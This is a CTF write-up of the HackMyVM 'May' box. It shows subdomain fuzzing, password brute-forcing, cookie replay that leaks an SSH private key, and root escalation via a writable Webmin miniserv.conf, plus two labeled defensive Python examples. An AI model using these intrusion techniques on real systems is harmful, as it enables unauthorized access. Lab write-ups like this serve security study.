This is May. It’s Medium rated.

Ports

SSH, HTTP and Webmin on Port 10000.

HTTP

nmap says:

http-title: Did not follow redirect to http://may.hmv

So I add that to /etc/hosts. I visit the homepage and get this:

admin: Web is under construction. Use Intranet.
marie: Where are now the keys?
alice: Yes, where are?
admin: :’(

So we have three usernames, plus a suggestion of subdomains. Good enough for me:

┌──(root💀kali)-[/opt/hackmyvm/may]
└─# wfuzz -c -f sub-fighter -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u "http://may.hmv" -H "Host: FUZZ.may.hmv" -t 42 --hw 12 
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://may.hmv/
Total requests: 114441

ID           Response   Lines    Word       Chars       Payload                           
000000048:   200        11 L     31 W       406 Ch      "portal"                           
000000183:   200        10 L     31 W       405 Ch      "ssh"                                                                                

Total time: 0
Processed Requests: 114441
Filtered Requests: 114439
Requests/sec.: 0

At both ssh.may.hmv and portal.may.hmv we get simple login forms, and all the fuzzing in the world doesn’t find anything else. I try brute-forcing the login with my three usernames, and eventually this request:

POST /check.php HTTP/1.1
Host: portal.may.hmv
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
Origin: http://portal.may.hmv
Connection: close
Referer: http://portal.may.hmv/
Upgrade-Insecure-Requests: 1

user=marie&password=rebelde

prompts this response:

HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Mon, 27 Dec 2021 10:26:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Set-Cookie: Sweetcookie=HMVHMXHMVHMXHMVHMXHMVHMX
Content-Length: 56

Hi marie!Portal is under development too.Come back later

This was done with Burp Turbo Intruder and the wordlist /usr/share/seclists/Passwords/xato-net-10-million-passwords-100000.txt.

Now, what if we try our cookie at the other subdomain?

POST /check.php HTTP/1.1
Host: ssh.may.hmv
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 27
Origin: http://ssh.may.hmv
Connection: close
Referer: http://ssh.may.hmv/
Upgrade-Insecure-Requests: 1
Cookie: Sweetcookie=HMVHMXHMVHMXHMVHMXHMVHMX

user=marie&password=rebelde

We get this:

HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Mon, 27 Dec 2021 10:44:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 1823

<pre>
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEA3HwQ6G67tSrcxTN2oOKplVae0b+gVe0x/btFSgGJy2bMoWc14qBO
jE7cEcO8tEB85mI3ftByjp6ZVcQWdmEFvqDjeiGvucu0cnO/kTYZGue34/P0+3TJ4Dn92l
# etc
l1iMe5oHRwklV/d5eEM/8bTl0MgDEhMYRLkmkuuhOb6rVIz3y3PVmE0zeQa2u6qj0stmLm
34pXoHjrR2KlUk5pvoXbcvm8TvnHypnIwls1QL5WsHMGNjt/AbboqLkA2m+v9IEEIww40w
8fGOoN87zX40QP6lAAAACW1hcmllQG1heQE=
-----END OPENSSH PRIVATE KEY-----
</pre>

Bingo.
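The weak point here is the cookie itself: Sweetcookie is a fixed string, and a second application honours it. As an added example (not part of the original writeup or the box), here is the kind of session handling that would have blocked this: every login gets a fresh random token, the server records which user and host it was issued for, and a token presented to a different host, a fixed value, or an expired one is rejected. The hostnames follow the writeup; the store, its API and the TTL are constructed for the demo.

```python
"""Added example, not from the writeup: a minimal server-side session store
with the properties the portal's Sweetcookie lacks. Hostnames are taken from
the writeup; the SessionStore API and its TTL are constructed for the demo."""
import hashlib
import secrets
import time


class SessionStore:
    def __init__(self, ttl_seconds=900):
        self.ttl = ttl_seconds
        self._sessions = {}  # sha256(token) -> {"user", "host", "issued"}

    @staticmethod
    def _key(token):
        # Keep a digest rather than the token, so a dump of the store yields no usable cookies.
        return hashlib.sha256(token.encode()).hexdigest()

    def issue(self, user, host, now=None):
        """Issue a fresh token bound to (user, host). 256 bits of randomness:
        nothing about the user or host lets anyone derive it."""
        token = secrets.token_urlsafe(32)
        self._sessions[self._key(token)] = {
            "user": user,
            "host": host,
            "issued": now if now is not None else time.time(),
        }
        return token

    def validate(self, token, host, now=None):
        """Return the user for a live token presented to `host`, else None."""
        now = now if now is not None else time.time()
        key = self._key(token)
        entry = self._sessions.get(key)
        if entry is None:                 # unknown or fixed value: no session
            return None
        if entry["host"] != host:         # issued for portal.may.hmv, useless at ssh.may.hmv
            return None
        if now - entry["issued"] > self.ttl:
            self._sessions.pop(key, None)  # expired: drop it
            return None
        return entry["user"]

    def revoke(self, token):
        self._sessions.pop(self._key(token), None)


def demo():
    """Exercise the store with a fixed clock; returns the outcome of each check."""
    store = SessionStore(ttl_seconds=900)
    t0 = 1_000_000.0
    token = store.issue("marie", "portal.may.hmv", now=t0)
    return {
        "same_host": store.validate(token, "portal.may.hmv", now=t0 + 1),
        "other_host": store.validate(token, "ssh.may.hmv", now=t0 + 1),
        "fixed_value": store.validate("HMVHMXHMVHMXHMVHMXHMVHMX", "portal.may.hmv", now=t0 + 1),
        "expired": store.validate(token, "portal.may.hmv", now=t0 + 901),
    }


if __name__ == "__main__":
    for check, result in demo().items():
        print(f"{check}: {result}")
```

Only the same-host check within the TTL yields a user; the cross-subdomain replay, the fixed string and the expired token all come back as None.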

┌──(root💀kali)-[/opt/hackmyvm/may]
└─# chmod 600 id_rsa
                                                                               
┌──(root💀kali)-[/opt/hackmyvm/may]
└─# ssh -i id_rsa marie@10.10.10.43
Linux may 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jul 22 03:34:48 2021
marie@may:~$
marie@may:~$ sudo -l
Matching Defaults entries for marie on may:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User marie may run the following commands on may:
    (ALL) NOPASSWD: /usr/sbin/halt, /usr/sbin/reboot, /usr/sbin/poweroff
marie@may:~$

Interesting, but not immediately useful. I run linpeas and find this:

Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
/etc/webmin/miniserv.conf

Hmmm, I’m pretty sure we shouldn’t have write access to that. Documentation is sparse, but in the end I create a Webmin user file of my own:

marie@may:~$ pwd
/home/marie
marie@may:~$ cat miniserv.users 
root:$1$84720675$F08uAAcIMcN8lZNg9D74p1:::::1584720675:::0::::

This uses the password 123. That’s the kinda thing an idiot would have on his luggage!

marie@may:~$ cat /etc/webmin/miniserv.conf 
port=10000
root=/usr/share/webmin
# etc
userfile=/home/marie/miniserv.users
keyfile=/etc/webmin/miniserv.pem
passwd_file=/etc/shadow
# etc

We edit /etc/webmin/miniserv.conf so that userfile points at our own file, as shown above, and use our sudo rights to reboot the server so that miniserv picks up the new config:

sudo -u root /usr/sbin/reboot

Once it reboots, we can log in at https://may.hmv:10000 as root:123 and have access to a root terminal:

[root@may ~]# id;hostname;date
uid=0(root) gid=0(root) groups=0(root)
may
Mon Dec 27 06:29:04 EST 2021
[root@may ~]# cd /root
[root@may ~]# ls -lash
total 24K
4.0K drwx------  3 root root 4.0K Jul 22 02:56 .
4.0K drwxr-xr-x 18 root root 4.0K Jul 22 02:54 ..
4.0K -rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
4.0K drwxr-xr-x  3 root root 4.0K Jul 21 15:01 .local
4.0K -rw-r--r--  1 root root  148 Aug 17  2015 .profile
4.0K -rw-------  1 root root   13 Jul 22 02:47 root.txt
[root@may ~]# cat root.txt
FLAG_GOES_HERE

[root@may ~]#
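The whole privesc rests on a root-owned service reading a config file that an ordinary user can edit. As an added example (not from the writeup or from Webmin itself), here is a small audit that a defender could run to catch exactly that: it flags a miniserv.conf, or the user database its userfile= line names, that is writable by anyone other than the expected owner, and a userfile that has been moved outside the Webmin config directory. The sample configs that demo() builds are constructed, and expected_uid is a parameter only so the demo can run as an unprivileged user; on a real host you would leave it at 0.

```python
"""Added example, not from the writeup: a defender-side audit of a Webmin
miniserv.conf. Clean means the config and the user database it points at are
owned by expected_uid, not writable by group or others, and the userfile
lives under the Webmin config directory. Sample configs are constructed."""
import os
import stat
import tempfile

GROUP_OR_OTHER_WRITE = stat.S_IWGRP | stat.S_IWOTH


def parse_miniserv_conf(path):
    """Parse key=value lines, skipping blanks and # comments.
    This parser keeps the last assignment of a key; it makes no claim about
    how miniserv itself resolves duplicate keys."""
    conf = {}
    with open(path) as fh:
        for line in fh:
            line = line.strip()
            if not line or line.startswith("#") or "=" not in line:
                continue
            key, _, value = line.partition("=")
            conf[key.strip()] = value.strip()
    return conf


def _check_file(path, label, expected_uid, findings):
    """Append findings for a file that must be owned by expected_uid and closed to other writers."""
    st = os.stat(path)
    if st.st_uid != expected_uid:
        findings.append(f"{label} {path} owned by uid {st.st_uid}, expected uid {expected_uid}")
    if st.st_mode & GROUP_OR_OTHER_WRITE:
        findings.append(f"{label} {path} is group/world writable (mode {oct(stat.S_IMODE(st.st_mode))})")


def audit_miniserv_conf(path, expected_dir="/etc/webmin", expected_uid=0):
    """Return a list of findings; an empty list means the config looks sane."""
    findings = []
    if not os.path.isfile(path):
        return [f"config {path} does not exist"]
    _check_file(path, "config", expected_uid, findings)

    userfile = parse_miniserv_conf(path).get("userfile")
    if userfile is None:
        findings.append(f"config {path} has no userfile= directive")
        return findings

    # Resolve symlinks on both sides, then require the userfile to sit under expected_dir.
    real_dir = os.path.realpath(expected_dir)
    real_userfile = os.path.realpath(userfile)
    if os.path.commonpath([real_dir, real_userfile]) != real_dir:
        findings.append(f"userfile={userfile} lies outside {real_dir}")
    if os.path.isfile(real_userfile):
        _check_file(real_userfile, "userfile", expected_uid, findings)
    else:
        findings.append(f"userfile={userfile} does not exist")
    return findings


def demo():
    """Build a clean config and one tampered the way the writeup describes; return both finding lists."""
    me = os.getuid()
    with tempfile.TemporaryDirectory() as tmp:
        etc = os.path.join(tmp, "etc", "webmin")
        home = os.path.join(tmp, "home", "marie")
        os.makedirs(etc)
        os.makedirs(home)

        good_users = os.path.join(etc, "miniserv.users")   # constructed, empty user database
        bad_users = os.path.join(home, "miniserv.users")   # user-controlled location
        for p in (good_users, bad_users):
            with open(p, "w"):
                pass
        os.chmod(good_users, 0o600)

        good = os.path.join(etc, "good.conf")
        with open(good, "w") as fh:
            fh.write(f"port=10000\nroot=/usr/share/webmin\nuserfile={good_users}\n")
        os.chmod(good, 0o600)

        bad = os.path.join(etc, "bad.conf")
        with open(bad, "w") as fh:
            fh.write(f"port=10000\nroot=/usr/share/webmin\n# etc\nuserfile={bad_users}\n")
        os.chmod(bad, 0o666)   # writable by everyone, the condition linpeas reported

        return audit_miniserv_conf(good, etc, me), audit_miniserv_conf(bad, etc, me)


if __name__ == "__main__":
    clean, tampered = demo()
    print("clean config:", clean or "no findings")
    print("tampered config:")
    for finding in tampered:
        print("  FLAG:", finding)
```

Run against a real box as root with the defaults, `audit_miniserv_conf("/etc/webmin/miniserv.conf")` returns an empty list when the file is root-owned, mode 600-ish and pointing at /etc/webmin/miniserv.users; the tampered sample here comes back with two findings, the world-writable config and the userfile redirected into a home directory.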

Bit of fun this one.